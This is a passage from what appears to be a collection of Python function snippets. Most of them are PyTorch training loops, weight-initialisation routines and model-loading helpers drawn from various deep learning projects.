-1\n for p in self.P:\n for subband in self.SUBBANDS:\n i += 1\n\n # --- load model ----\n pref = self.model_dir + \"/\" + self.name % (subband, p)\n model = copy.deepcopy(self.model)\n model.model.load_weights(pref + \"_epochs_%d\" % epochs[i])\n self.NET.append(model)\n # --- end load model ----\n\n # --- load permutation ----\n self.permutation.append(\n np.load(self.model_dir + \"/permutation_\" + self.name %\n (subband, p) + \".npy\"))\n # --- end load permutation ----", "def train(self, mode=True):\n super(ResNet, self).train(mode)\n self._freeze_stages()\n if mode and self.norm_eval:\n for m in self.modules():\n # trick: eval have effect on BatchNorm only\n if isinstance(m, _BatchNorm):\n m.eval()", "def before_train(self, logs=None):\n self.config = self.trainer.config\n self.unrolled = self.trainer.config.unrolled\n self.device = self.trainer.config.device\n self.model = self.trainer.model\n self.optimizer = self.trainer.optimizer\n self.lr_scheduler = self.trainer.lr_scheduler\n self.loss = self.trainer.loss\n self.search_alg = SearchAlgorithm(SearchSpace())\n self._set_algorithm_model(self.model)\n self.trainer.train_loader = self.trainer._init_dataloader(mode='train')\n self.trainer.valid_loader = self.trainer._init_dataloader(mode='val')\n normal_selected_idxs = torch.tensor(len(self.model.alphas_normal) * [-1],\n requires_grad=False, dtype=torch.int).cuda()\n reduce_selected_idxs = torch.tensor(len(self.model.alphas_reduce) * [-1],\n requires_grad=False, dtype=torch.int).cuda()\n normal_candidate_flags = torch.tensor(len(self.model.alphas_normal) * [True],\n requires_grad=False, dtype=torch.bool).cuda()\n reduce_candidate_flags = torch.tensor(len(self.model.alphas_reduce) * [True],\n requires_grad=False, dtype=torch.bool).cuda()\n logging.info('normal_selected_idxs: {}'.format(normal_selected_idxs))\n logging.info('reduce_selected_idxs: {}'.format(reduce_selected_idxs))\n logging.info('normal_candidate_flags: {}'.format(normal_candidate_flags))\n logging.info('reduce_candidate_flags: {}'.format(reduce_candidate_flags))\n self.model.normal_selected_idxs 
= normal_selected_idxs\n self.model.reduce_selected_idxs = reduce_selected_idxs\n self.model.normal_candidate_flags = normal_candidate_flags\n self.model.reduce_candidate_flags = reduce_candidate_flags\n logging.info(F.softmax(torch.stack(self.model.alphas_normal, dim=0), dim=-1).detach())\n logging.info(F.softmax(torch.stack(self.model.alphas_reduce, dim=0), dim=-1).detach())\n self.normal_probs_history = []\n self.reduce_probs_history = []", "def train(self, mode: bool = True):\n if self.nn_module.training != mode:\n self.nn_module.train(mode)", "def initialize(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.Linear):\n nn.init.xavier_normal_(m.weight)\n if m.bias is not None:\n nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)", "def setUp(self):\n\t\tprint(\"\\n-------------------------------------\\nIn Test_PyTorchLayers:\", self._testMethodName)\n\t\tww.weightwatcher.torch = torch\n\t\tself.model = models.resnet18()\n\t\tfor layer in self.model.modules():\n\t\t\tself.last_layer = layer", "def train(self, mode: bool = True) -> None:\n super().train(mode=mode)\n if mode:\n self.mean_module = None\n self.covar_module = None\n self.likelihood = None\n self.task_covar_module = None", "def _init_modules(self, pretrained_weights=None):\n if pretrained_weights is None:\n if cfg.MODEL.LOAD_PRETRAINED_BACKBONE_WEIGHTS:\n print(\"\\n-------------------------------------------\")\n print(\"Load pre-trained ImageNet weights\")\n print(\"\\n-------------------------------------------\")\n weight_utils.load_caffe2_pretrained_weights(self, cfg.MODEL.PRETRAINED_BACKBONE_WEIGHTS)\n return\n\n pretrained_detectron = torch.load(pretrained_weights)\n\n if cfg.RPN.RPN_ON:\n load_layers = ['Conv_Body', 'RPN']\n else:\n load_layers = ['Conv_Body']\n\n mapping, _ = self.detectron_weight_mapping()\n state_dict = {}\n ckpt = pretrained_detectron['model']\n for name in ckpt:\n if name.split('.')[0] in load_layers:\n if mapping[name]:\n state_dict[name] = ckpt[name]\n self.load_state_dict(state_dict, strict=False)\n del pretrained_detectron\n torch.cuda.empty_cache()", "def init_weights(self, clz):\n for ch in self.children():\n if issubclass(ch.__class__, nn.Module) and not issubclass(ch.__class__, PreTrainedModel):\n ch.apply(lambda module: clz._init_weights(self.lrm, module))", "def train(self, mode=True):\n nn.Module.train(self, mode)\n\n if mode:\n # Set all bn layers in backbone to eval mode\n def set_bn_eval(m):\n classname = m.__class__.__name__\n if classname.find(\"BatchNorm\") != -1:\n m.eval()\n\n self.backbone.apply(set_bn_eval)", "def before_epoch(self, epoch, logs=None):\n if vega.is_torch_backend():\n self.valid_loader_iter = iter(self.trainer.valid_loader)", "def _train(self):\n self.network.train() # note that here we are calling torch.nn.Module train class method\n epochs_since_improvement = 0\n best_params = None\n self.calculate_validation_loss()\n best_validation_loss = self.validation_average_loss\n\n while epochs_since_improvement < 10:\n self.train_epoch()\n self.calculate_validation_loss()\n if self.validation_average_loss < best_validation_loss:\n epochs_since_improvement = 0\n best_validation_loss = self.validation_average_loss\n best_params = self.network.state_dict()\n else:\n epochs_since_improvement += 1\n LOGGER.info(\"Epochs since improvement in validation_loss: {} \\n\".format(epochs_since_improvement))\n if self.maximum_epochs_allowed is not None and 
self.epochs_trained >= self.maximum_epochs_allowed:\n break\n LOGGER.info(\"Training complete after {} epochs \\n\".format(self.epochs_trained))\n LOGGER.info(\"Best training loss achieved: {} \\n\".format(self.training_average_loss))\n LOGGER.info(\"Best validation loss achieved: {}\".format(self.validation_average_loss))\n self.learned_params = best_params\n self.network.load_state_dict(best_params)", "def train(self, train_loader):\n\n self.model.train()\n with torch.enable_grad():\n return self._iteration(train_loader)", "def train(self):\n # self.recognizer.train()\n self.detector.train()\n self.shared_conv.train()", "def train(self, mode=True):\n super(TSN, self).train(mode)\n count = 0\n if self._enable_pbn:\n print(\"Freezing BatchNorm2D except the first one.\")\n for m in self.base_model.modules():\n # print('the type train model : {}'.format(type(m)))\n if isinstance(m, torch.nn.BatchNorm2d) or \\\n isinstance(m, linklink.nn.syncbn_layer.SyncBatchNorm2d):\n count += 1\n if count >= (2 if self._enable_pbn else 1):\n m.eval()\n # print('the freeze module: {} of {}th'.format(type(m), count))\n # shutdown update in frozen mode\n m.weight.requires_grad = False\n m.bias.requires_grad = False", "def train(self, train_loader):\n pass", "def trainNet():", "def test_no_model_parallel(self):\n for m in ['transformer/generator', 'transformer/ranker']:\n try:\n _ = self._distributed_train_model(model=m, model_parallel=True)\n except RuntimeError:\n pass\n else:\n self.fail('Did not raise RuntimeError')", "def set_train_mode(training, mnet, hnet, hhnet, dis):\n for net in [mnet, hnet, hhnet, dis]:\n if net is not None:\n if training:\n net.train()\n else:\n net.eval()", "def train(self):\n\n # Ensure everything is sent to GPU if being trained on the cloud\n if self.local == False:\n torch.set_default_tensor_type(torch.cuda.FloatTensor)\n print(\"\\n \\n EVERYTHING TO CUDA \\n \\n\")\n\n # Load weights if applicable\n if self.load_weights == True:\n start_epoch, loss = self.load_checkpoint(\n self.model, self.optimizer, self.model_name\n )\n start_epoch += 1\n print(\"\\n \\n [WEIGHTS LOADED]\")\n else:\n start_epoch = 0\n\n # Start Training Loop\n for epoch in range(start_epoch, self.epochs + 1):\n\n # TRAIN\n if epoch > 0:\n\n # Set model to training mode\n self.model.train()\n\n # Initialize loss and counter that will allow model weights to be saved and overwritten every 10 minibatches\n train_loss = 0\n counter = 0\n\n # Iterate through train set\n for (\n image1,\n image2,\n annotation1,\n annotation2,\n landmark1,\n landmark2,\n ) in tqdm(self.train_loader, desc=\"Train Epoch \" + str(epoch)):\n\n # image tensors and bounding box and label tensors to device\n image1 = image1.to(self.device)\n image2 = image2.to(self.device)\n\n # Forward pass of model\n x1_hat, x2_hat, z1, z2 = self.model(image1, image2)\n\n # Calculate loss from one pass and append to training loss\n loss = self.loss_fcn(\n image1, image2, x1_hat, x2_hat, z1.detach(), z2.detach()\n )\n train_loss += loss.item()\n\n # Clear optimizer gradient\n self.optimizer.zero_grad()\n\n # Backprop\n loss.backward()\n\n # Take a step with optimizer\n self.optimizer.step()\n\n # Save/overwrite model weights every 10 minibatches\n if counter % 10 == 0:\n self.save_checkpoint(\n self.model,\n self.optimizer,\n self.model_name,\n epoch,\n train_loss,\n )\n\n print(\n f\"====> Epoch: {epoch} Average train loss: {train_loss / len(self.train_loader.dataset):.4f}\\n\"\n )\n\n # Save entire model as .pt after every epoch of training\n if 
self.local == True:\n torch.save(\n self.model,\n os.path.join(self.save_path, self.model_name + \".pt\"),\n )\n else:\n torch.save(\n self.model, self.model_name + \"_epoch\" + str(epoch) + \".pt\"\n )\n print(\"SAVED MODEL EPOCH \" + str(epoch))\n\n # Evaluate on Validation Set after each epoch\n with torch.no_grad():\n\n # Set model to evaluation mode\n self.model.eval()\n\n # Iterate through validation set\n for image1, image2, annotation1, annotation2 in tqdm(\n self.val_loader, desc=\"Validation Epoch \" + str(epoch)\n ):\n\n # Initialize validation loss\n val_loss = 0\n\n # Send images to device\n image1 = image1.to(self.device)\n image2 = image2.to(self.device)\n\n # Forward pass of model\n x1_hat, x2_hat, z1, z2 = self.model(image1, image2)\n\n # Calculate loss and append to validation loss\n loss = self.loss_fcn(\n image1, image2, x1_hat, x2_hat, z1.detach(), z2.detach()\n )\n val_loss += loss\n\n print(\n f\"====> Epoch: {epoch} Average test loss: {val_loss / len(self.val_loader.dataset):.4f}\\n\"\n )\n\n print(\"[DONE EPOCH{}]\".format(epoch))\n\n print(\"[DONE TRAINING]\")\n\n # Save model after all epochs are finished\n if self.local == True:\n torch.save(\n self.model, os.path.join(self.save_path, self.model_name + \".pt\")\n )\n else:\n torch.save(self.model, self.model_name + \".pt\")", "def train_start(self):\n self.module.img_enc.train()\n self.module.txt_enc.train()", "def train(self, x_data, y_data):\n for model in self.list_of_models:\n model.fit(x_data, y_data)\n self.trained_models.append(model)", "def train(settings=None):\n if not settings:\n settings = Settings()\n train_transform = torchvision.transforms.Compose([transforms.RandomlySelectPatchAndRescale(),\n transforms.RandomHorizontalFlip(),\n transforms.NegativeOneToOneNormalizeImage(),\n transforms.NumpyArraysToTorchTensors()])\n validation_transform = torchvision.transforms.Compose([transforms.RandomlySelectPatchAndRescale(),\n transforms.NegativeOneToOneNormalizeImage(),\n transforms.NumpyArraysToTorchTensors()])\n\n train_dataset = CrowdDatasetWithUnlabeled(settings.train_dataset_path, 'train', transform=train_transform)\n train_dataset_loader = torch.utils.data.DataLoader(train_dataset, batch_size=settings.batch_size, shuffle=True,\n num_workers=settings.number_of_data_loader_workers)\n validation_dataset = CrowdDataset(settings.validation_dataset_path, 'validation', transform=validation_transform)\n validation_dataset_loader = torch.utils.data.DataLoader(validation_dataset, batch_size=settings.batch_size,\n shuffle=False,\n num_workers=settings.number_of_data_loader_workers)\n\n gan = GAN()\n gpu(gan)\n D = gan.D\n G = gan.G\n discriminator_optimizer = Adam(D.parameters())\n generator_optimizer = Adam(G.parameters())\n\n step = 0\n epoch = 0\n\n if settings.load_model_path:\n d_model_state_dict, d_optimizer_state_dict, epoch, step = load_trainer(prefix='discriminator',\n settings=settings)\n D.load_state_dict(d_model_state_dict)\n discriminator_optimizer.load_state_dict(d_optimizer_state_dict)\n discriminator_optimizer.param_groups[0].update({'lr': settings.learning_rate, 'weight_decay': settings.weight_decay})\n if settings.load_model_path:\n g_model_state_dict, g_optimizer_state_dict, _, _ = load_trainer(prefix='generator',\n settings=settings)\n G.load_state_dict(g_model_state_dict)\n generator_optimizer.load_state_dict(g_optimizer_state_dict)\n generator_optimizer.param_groups[0].update({'lr': settings.learning_rate})\n\n running_scalars = defaultdict(float)\n validation_running_scalars = 
defaultdict(float)\n running_example_count = 0\n datetime_string = datetime.datetime.now().strftime(\"y%Ym%md%dh%Hm%Ms%S\")\n trial_directory = os.path.join(settings.log_directory, settings.trial_name + ' ' + datetime_string)\n os.makedirs(trial_directory, exist_ok=True)\n summary_writer = SummaryWriter(os.path.join(trial_directory, 'train'))\n validation_summary_writer = SummaryWriter(os.path.join(trial_directory, 'validation'))\n print('Starting training...')\n step_time_start = datetime.datetime.now()\n while epoch < settings.number_of_epochs:\n for examples, unlabeled_examples in train_dataset_loader:\n unlabeled_images = unlabeled_examples[0]\n # Real image discriminator processing.\n discriminator_optimizer.zero_grad()\n images, labels, _ = examples\n images, labels = Variable(gpu(images)), Variable(gpu(labels))\n current_batch_size = images.data.shape[0]\n predicted_labels, predicted_counts = D(images)\n real_feature_layer = D.feature_layer\n density_loss = torch.abs(predicted_labels - labels).pow(settings.loss_order).sum(1).sum(1).mean()\n count_loss = torch.abs(predicted_counts - labels.sum(1).sum(1)).pow(settings.loss_order).mean()\n loss = count_loss + (density_loss * 10)\n loss.backward()\n running_scalars['Labeled/Loss'] += loss.data[0]\n running_scalars['Labeled/Count Loss'] += count_loss.data[0]\n running_scalars['Labeled/Density Loss'] += density_loss.data[0]\n running_scalars['Labeled/Count ME'] += (predicted_counts - labels.sum(1).sum(1)).mean().data[0]\n # Unlabeled.\n _ = D(gpu(images))\n labeled_feature_layer = D.feature_layer\n _ = D(gpu(Variable(unlabeled_images)))\n unlabeled_feature_layer = D.feature_layer\n unlabeled_loss = feature_distance_loss(unlabeled_feature_layer, labeled_feature_layer,\n scale=False) * settings.unlabeled_loss_multiplier\n unlabeled_loss.backward()\n # Fake.\n _ = D(gpu(Variable(unlabeled_images)))\n unlabeled_feature_layer = D.feature_layer\n z = torch.from_numpy(MixtureModel([norm(-settings.mean_offset, 1), norm(settings.mean_offset, 1)]).rvs(\n size=[current_batch_size, 100]).astype(np.float32))\n # z = torch.randn(settings.batch_size, noise_size)\n fake_examples = G(gpu(Variable(z)))\n _ = D(fake_examples.detach())\n fake_feature_layer = D.feature_layer\n fake_loss = feature_distance_loss(unlabeled_feature_layer, fake_feature_layer,\n order=1).neg() * settings.fake_loss_multiplier\n fake_loss.backward()\n # Feature norm loss.\n _ = D(gpu(Variable(unlabeled_images)))\n unlabeled_feature_layer = D.feature_layer\n feature_norm_loss = (unlabeled_feature_layer.norm(dim=1).mean() - 1).pow(2)\n feature_norm_loss.backward()\n # Gradient penalty.\n if settings.gradient_penalty_on:\n alpha = gpu(Variable(torch.rand(2)))\n alpha = alpha / alpha.sum(0)\n interpolates = (alpha[0] * gpu(Variable(unlabeled_images, requires_grad=True)) +\n alpha[1] * gpu(Variable(fake_examples.detach().data, requires_grad=True)))\n _ = D(interpolates)\n interpolates_predictions = D.feature_layer\n gradients = torch.autograd.grad(outputs=interpolates_predictions, inputs=interpolates,\n grad_outputs=gpu(torch.ones(interpolates_predictions.size())),\n create_graph=True, only_inputs=True)[0]\n gradient_penalty = ((gradients.norm(dim=1) - 1) ** 2).mean() * settings.gradient_penalty_multiplier\n gradient_penalty.backward()\n # Discriminator update.\n discriminator_optimizer.step()\n # Generator.\n if step % 1 == 0:\n generator_optimizer.zero_grad()\n _ = D(gpu(Variable(unlabeled_images)))\n unlabeled_feature_layer = D.feature_layer.detach()\n z = 
torch.randn(current_batch_size, 100)\n fake_examples = G(gpu(Variable(z)))\n _ = D(fake_examples)\n fake_feature_layer = D.feature_layer\n generator_loss = feature_distance_loss(unlabeled_feature_layer, fake_feature_layer)\n generator_loss.backward()\n generator_optimizer.step()\n\n running_example_count += images.size()[0]\n if step % settings.summary_step_period == 0 and step != 0:\n comparison_image = viewer.create_crowd_images_comparison_grid(cpu(images), cpu(labels),\n cpu(predicted_labels))\n summary_writer.add_image('Comparison', comparison_image, global_step=step)\n fake_images_image = torchvision.utils.make_grid(fake_examples.data[:9], nrow=3)\n summary_writer.add_image('Fake', fake_images_image, global_step=step)\n print('\\rStep {}, {}...'.format(step, datetime.datetime.now() - step_time_start), end='')\n step_time_start = datetime.datetime.now()\n for name, running_scalar in running_scalars.items():\n mean_scalar = running_scalar / running_example_count\n summary_writer.add_scalar(name, mean_scalar, global_step=step)\n running_scalars[name] = 0\n running_example_count = 0\n for validation_examples in validation_dataset_loader:\n images, labels, _ = validation_examples\n images, labels = Variable(gpu(images)), Variable(gpu(labels))\n predicted_labels, predicted_counts = D(images)\n density_loss = torch.abs(predicted_labels - labels).pow(settings.loss_order).sum(1).sum(1).mean()\n count_loss = torch.abs(predicted_counts - labels.sum(1).sum(1)).pow(settings.loss_order).mean()\n count_mae = torch.abs(predicted_counts - labels.sum(1).sum(1)).mean()\n count_me = (predicted_counts - labels.sum(1).sum(1)).mean()\n validation_running_scalars['Labeled/Density Loss'] += density_loss.data[0]\n validation_running_scalars['Labeled/Count Loss'] += count_loss.data[0]\n validation_running_scalars['Test/Count MAE'] += count_mae.data[0]\n validation_running_scalars['Labeled/Count ME'] += count_me.data[0]\n comparison_image = viewer.create_crowd_images_comparison_grid(cpu(images), cpu(labels),\n cpu(predicted_labels))\n validation_summary_writer.add_image('Comparison', comparison_image, global_step=step)\n for name, running_scalar in validation_running_scalars.items():\n mean_scalar = running_scalar / len(validation_dataset)\n validation_summary_writer.add_scalar(name, mean_scalar, global_step=step)\n validation_running_scalars[name] = 0\n step += 1\n epoch += 1\n if epoch != 0 and epoch % settings.save_epoch_period == 0:\n save_trainer(trial_directory, D, discriminator_optimizer, epoch, step, prefix='discriminator')\n save_trainer(trial_directory, G, generator_optimizer, epoch, step, prefix='generator')\n save_trainer(trial_directory, D, discriminator_optimizer, epoch, step, prefix='discriminator')\n save_trainer(trial_directory, G, generator_optimizer, epoch, step, prefix='generator')\n print('Finished Training')\n return trial_directory", "def init_weights(self):\n\n for ch in self.children():\n if issubclass(ch.__class__, torch.nn.Module) and not issubclass(ch.__class__, PreTrainedModel):\n ch.apply(lambda module: self.transformer.__class__._init_weights(self.transformer, module))", "def train():\n pass", "def train(train_dataset: torch.utils.data.Dataset, test_dataset: torch.utils.data.Dataset,\n training_config: dict = train_config, global_config: dict = global_config):\n\n for path in global_config.values():\n create_dirs(path)\n\n # wrap datasets with Dataloader classes\n train_loader = torch.utils.data.DataLoader(train_dataset,\n **training_config[\"DATA_LOADER_CONFIG\"])\n test_loader = 
torch.utils.data.DataLoader(test_dataset,\n **training_config[\"DATA_LOADER_CONFIG\"])\n\n # model name & paths\n name = \"_\".join([train_config[\"DATE\"], train_config[\"SESSION_NAME\"]])\n modelpath = os.path.join(global_config[\"WEIGHT_DIR\"], name)\n\n # instantiate model\n model = training_config[\"MODEL\"](**training_config[\"MODEL_CONFIG\"])\n\n optimizer = training_config[\"OPTIMIZER\"](model.parameters(),\n **training_config[\"OPTIMIZER_CONFIG\"])\n\n # set up ignite engine\n training_config[\"METRICS\"].update({\"loss\" : Loss(training_config[\"LOSS\"])})\n trainer = create_supervised_trainer(model=model, optimizer=optimizer,\n loss_fn=training_config[\"LOSS\"],\n device=training_config[\"DEVICE\"])\n evaluator = create_supervised_evaluator(model,\n metrics=training_config[\"METRICS\"],\n device=training_config[\"DEVICE\"])\n\n\n # tensorboardX setup\n log_dir = os.path.join(global_config[\"LOG_DIR\"], \"tensorboardx\", name)\n create_dirs(log_dir)\n writer = SummaryWriter(logdir=log_dir)\n\n # log using the logging tool\n logger = log.Log(training_config, run_name=train_config['SESSION_NAME'])\n\n @trainer.on(Events.ITERATION_COMPLETED)\n def log_training(engine):\n iteration = (engine.state.iteration - 1) % len(train_loader) + 1\n writer.add_scalar(\"training/loss\", engine.state.output, engine.state.iteration)\n if iteration % 4 == 0:\n print(\"\\repoch[{}] iteration[{}/{}] loss: {:.2f} \".format(engine.state.epoch,\n iteration, len(train_loader),\n engine.state.output), end=\"\")\n\n # generic evaluation function\n def evaluate(engine, loader):\n evaluator.run(loader)\n metrics = evaluator.state.metrics\n return metrics\n\n # training data metrics\n @trainer.on(Events.EPOCH_COMPLETED)\n def log_training_results(engine):\n print(\"\\ntraining results - epoch {}\".format(engine.state.epoch))\n metrics = evaluate(engine, train_loader)\n print(metrics)\n for key, value in metrics.items():\n logger.log_metric(key, value)\n writer.add_scalar(\"training/avg_{}\".format(key), value, engine.state.epoch)\n\n # test data metrics\n @trainer.on(Events.EPOCH_COMPLETED)\n def log_validation_results(engine):\n print(\"test results - epoch {}\".format(engine.state.epoch))\n metrics = evaluate(engine, test_loader)\n print(metrics)\n for key, value in metrics.items():\n writer.add_scalar(\"validation/avg_{}\".format(key), value, engine.state.epoch)\n\n # model checkpointing\n @trainer.on(Events.EPOCH_COMPLETED)\n def model_checkpoint(engine):\n torch.save(model.state_dict(), modelpath + \".pth\")\n print(\"Checkpoint saved to {}\".format(modelpath + \".pth\"))\n\n # training iteration\n try:\n trainer.run(train_loader, max_epochs=training_config[\"EPOCHS\"])\n except KeyboardInterrupt:\n torch.save(model.state_dict(), modelpath + \".pth\")\n print(\"Model saved to {}\".format(modelpath + \".pth\"))\n raise KeyboardInterrupt\n\n # write weights\n torch.save(model.state_dict(), modelpath + \".pth\")\n\n # write csv log file\n log_content = training_config.copy()\n evaluator.run(test_loader)\n log_content[\"VAL_METRICS\"] = evaluator.state.metrics\n log_path = os.path.join(global_config[\"LOG_DIR\"], training_config[\"LOGFILE\"])\n write_log(log_path, log_content)\n\n logger.end_run()\n \n return evaluator.state.metrics[\"training/avg_loss\"]", "def forward_train(self, *args, **kwargs):\n pass", "def train():\n init_distributed_mode(args)\n save_dir = TRAIN_CFG['save_dir']\n if not os.path.exists(save_dir) and torch.distributed.get_rank() == 0:\n os.mkdir(save_dir)\n kwargs = {}\n # If augmenting 
data, disable Pytorch's own augmentataion\n # This has to be done manually as augmentation is embedded\n # refer : https://github.com/pytorch/vision/issues/2263\n base_path = DATASET_CFG['base_path']\n train_set = DATASET_CFG['train']\n valid_set = DATASET_CFG['valid']\n dset_mean_std = DATASET_CFG['mean_std']\n if dset_mean_std is not None:\n dataset_mean = [i/255. for i in dset_mean_std[0]]\n dataset_std = [i/255. for i in dset_mean_std[1]]\n else:\n dataset_mean, dataset_std = compute_mean_std(base_path, train_set)\n kwargs['image_mean'] = dataset_mean\n kwargs['image_std'] = dataset_std\n kwargs['min_size'] = DATASET_CFG['min_size']\n kwargs['max_size'] = DATASET_CFG['max_size']\n kwargs['box_detections_per_img'] = 300 # increase max det to max val in our benchmark\n\n # Set benchmark related parameters\n if benchmark == 'ScutHead':\n combined_cfg = {**cfg, **sh_anchors}\n elif benchmark == 'CrowdHuman':\n combined_cfg = {**cfg, **ch_anchors}\n elif benchmark == 'Combined':\n combined_cfg = {**cfg, **combined_anchors}\n else:\n raise ValueError(\"New dataset has to be registered\")\n\n # Create Model\n default_filter = False\n model = customRCNN(cfg=combined_cfg,\n use_deform=NET_CFG['use_deform'],\n ohem=NET_CFG['ohem'],\n context=NET_CFG['context'],\n custom_sampling=NET_CFG['custom_sampling'],\n default_filter=default_filter,\n soft_nms=NET_CFG['soft_nms'],\n upscale_rpn=NET_CFG['upscale_rpn'],\n median_anchors=NET_CFG['median_anchors'],\n **kwargs).cuda() \n model_without_ddp = model\n if args.distributed:\n model = torch.nn.parallel.DistributedDataParallel(model, device_ids=[args.gpu],\n find_unused_parameters=True)\n model_without_ddp = model.module\n\n # Create Optimizer\n params = [p for p in model.parameters() if p.requires_grad]\n optimizer = torch.optim.SGD(params, lr=HYP_CFG['learning_rate'],\n momentum=HYP_CFG['learning_rate'],\n weight_decay=HYP_CFG['weight_decay'])\n\n scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer,\n milestones=TRAIN_CFG['milestones'],\n gamma=HYP_CFG['gamma'])\n # Restore from checkpoint\n pt_model = TRAIN_CFG['pretrained_model']\n if pt_model:\n model_without_ddp = restore_network(model_without_ddp, pt_model,\n only_backbone=TRAIN_CFG['only_backbone'])\n \n # Create training and vaid dataset\n dataset_param = {'mean': dataset_mean, 'std':dataset_std,\n 'shape':(kwargs['min_size'], kwargs['max_size'])}\n batch_size = HYP_CFG['batch_size']\n train_dataset = HeadDataset(train_set,\n base_path,\n dataset_param,\n train=True)\n val_dataset = HeadDataset(valid_set,\n base_path,\n dataset_param,\n train=False)\n train_sampler = torch.utils.data.distributed.DistributedSampler(train_dataset)\n train_batch_sampler = torch.utils.data.BatchSampler(train_sampler,\n batch_size,\n drop_last=True)\n train_data_loader = torch.utils.data.DataLoader(train_dataset,\n batch_sampler=train_batch_sampler,\n num_workers=args.num_workers,\n collate_fn=collate_fn)\n\n val_sampler = torch.utils.data.distributed.DistributedSampler(val_dataset)\n val_batch_sampler = torch.utils.data.BatchSampler(val_sampler,\n batch_size,\n drop_last=True)\n val_data_loader = torch.utils.data.DataLoader(val_dataset,\n batch_sampler=val_batch_sampler,\n num_workers=args.num_workers,\n collate_fn=collate_fn)\n # Fastforward the LR decayer\n start_epoch = TRAIN_CFG['start_epoch']\n max_epoch = TRAIN_CFG['max_epoch']\n for _ in range(0, -1):\n scheduler.step()\n\n # Start training\n print(\"======= Training for \" + str(max_epoch) + \"===========\")\n for epoch in range(start_epoch, 
int(max_epoch) + 1):\n if epoch % TRAIN_CFG['eval_every'] == 0:\n print(\"========= Evaluating Model ==========\")\n result_dict = evaluate(model, val_data_loader, benchmark=benchmark)\n if torch.distributed.get_rank() == 0:\n logging.info('Eval score at {0} epoch is {1}'.format(str(epoch),\n result_dict))\n \n train_one_epoch(model, optimizer, train_data_loader,\n device, epoch, print_freq=1000)\n scheduler.step()\n if torch.distributed.get_rank() == 0:\n print(\"Saving model\")\n torch.save(model.state_dict(), osp.join(save_dir,\n TRAIN_CFG['exp_name'] + '_epoch_' + str(epoch) + '.pth'))", "def set_module_trainable(module: nn.Module, mode: bool) -> None:\n for param in module.parameters():\n param.requires_grad = mode", "def forward_train(self, imgs, img_metas, **kwargs):\n pass", "def train(model, criterion, optimizer, scheduler, loaders, callbacks, logdir, num_epochs, verbose):\n \n model = model.cuda()\n for i in range(num_epochs):\n bset_loss = 99999999\n custom_train(model, criterion, optimizer, loaders[\"train\"])\n loss = evaluate(model, loaders[\"valid\"])\n with open(f\"{logdir}/logs.txt\", 'a') as f:\n print(f\"loss:{loss} epoch:{i}\", file=f)\n \n if bset_loss >= loss:\n torch.save(model.state_dict(), f\"{logdir}/checkpoints/best.pth\")\n bset_loss = loss", "def __init__(self, **kwargs):\n\n nn.Module.__init__(self)\n BaseEstimator.__init__(self, **kwargs)", "def train(self):\n raise NotImplementedError", "def setup_ml():\n # load vocabulary\n vocab = open(f\"{VOCABULARY_FILE}\", \"rb\")\n vocab = pickle.load(vocab)\n\n # transformer to preprocess images\n transform_test = transforms.Compose([ \n transforms.Resize(256), \n transforms.RandomCrop(224), \n transforms.RandomHorizontalFlip(), \n transforms.ToTensor(), \n transforms.Normalize((0.485, 0.456, 0.406), \n (0.229, 0.224, 0.225))])\n\n # Initialize the encoder and decoder, and set each to inference mode.\n encoder = EncoderCNN(EMBED_SIZE)\n encoder.eval()\n decoder = DecoderRNN(EMBED_SIZE, HIDDEN_SIZE, VOCAB_SIZE)\n decoder.eval()\n\n # load encoder\n encoder.load_state_dict(\n torch.load(\n os.path.join('./models', ENCODER_FILE),\n map_location=torch.device('cpu')\n )\n )\n\n # load decoder\n decoder.load_state_dict(\n torch.load(\n os.path.join('./models', DECODER_FILE),\n map_location=torch.device('cpu')\n )\n )\n print(\"\\n-- Model components were imported succesfully! 
-- \\n\")\n return transform_test, encoder, decoder, vocab", "def set_trainable(model, train):\r\n model.trainable = train\r\n for l in model.layers:\r\n l.trainable = train", "def train(self):\n\n if self.Algorithms.startswith(\"TMVA:\"):\n self.trainTMVAMethods()\n elif self.Algorithms.startswith(\"SKL:\"):\n self.trainSKLMethods()\n elif self.Algorithms.startswith(\"TF:\"):\n self.trainTFMethods()\n else:\n print(\"ERROR: Unknown algorithm: {}\".format(self.Algorithms))\n\n return", "def train(self):\n best_loss = math.inf\n for _ in range(self.epoch, self.end_epoch):\n self.summary_writer.add_scalar('epoch', self.epoch, self.total_steps)\n epoch_loss, _ = self.run_epoch(self.dataloader)\n if epoch_loss < best_loss:\n best_loss = epoch_loss\n # save best module as onnx format\n dummy_input = torch.randn((10, 3, self.image_dim, self.image_dim))\n module_path = os.path.join(self.models_dir, 'resnet.onnx')\n self.save_module(\n self.resnet.module, module_path, save_onnx=True, dummy_input=dummy_input)\n self.save_checkpoint('resnet_e{}_state.pth'.format(self.epoch))\n\n # validate step\n val_loss, _ = self.validate()\n\n # update learning rates\n self.lr_scheduler.step(val_loss)\n self.save_learning_rate(self.summary_writer, self.optimizer, self.total_steps)\n self.epoch += 1\n self.test()", "def _train(args): \n\n #device = 'cuda' if torch.cuda.is_available() else 'cpu'\n device = 'cpu'\n logger.info(\"Device Type: {}\".format(device))\n\n logger.info(\"Loading SUN360 dataset\")\n transform = transforms.Compose(\n [transforms.Resize((224,224)),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])])\n target_transform = transforms.Compose([transforms.Resize((224,224)),\n transforms.ToTensor()]) \n\n trainset = SUN360Dataset(\"imagedata.json\",transform = transform, target_transform = target_transform)\n train_loader = DataLoader(trainset, batch_size=args.batch_size,\n shuffle=True, num_workers=args.workers)\n \"\"\"\n testset = torchvision.datasets.CIFAR10(root=args.data_dir, train=False,\n download=False, transform=transform)\n test_loader = DataLoader(testset, batch_size=args.batch_size,\n shuffle=False, num_workers=args.workers)\n \"\"\" \n\n logger.info(\"Model loaded\")\n model = EfficientNet.from_name('efficientnet-b0',conv_type='Equi')\n\n if torch.cuda.device_count() > 1:\n logger.info(\"Gpu count: {}\".format(torch.cuda.device_count()))\n model = nn.DataParallel(model)\n\n model = model.to(device)\n\n criterion = CELoss().to(device)\n optimizer = torch.optim.SGD(model.parameters(), lr=args.lr, momentum=args.momentum)\n\n for epoch in range(0, args.epochs):\n running_loss = 0.0\n for i, data in enumerate(train_loader):\n # get the inputs\n inputs, EM , CM = data\n inputs, EM, CM = inputs.to(device), EM.to(device), CM.to(device)\n\n # zero the parameter gradients\n 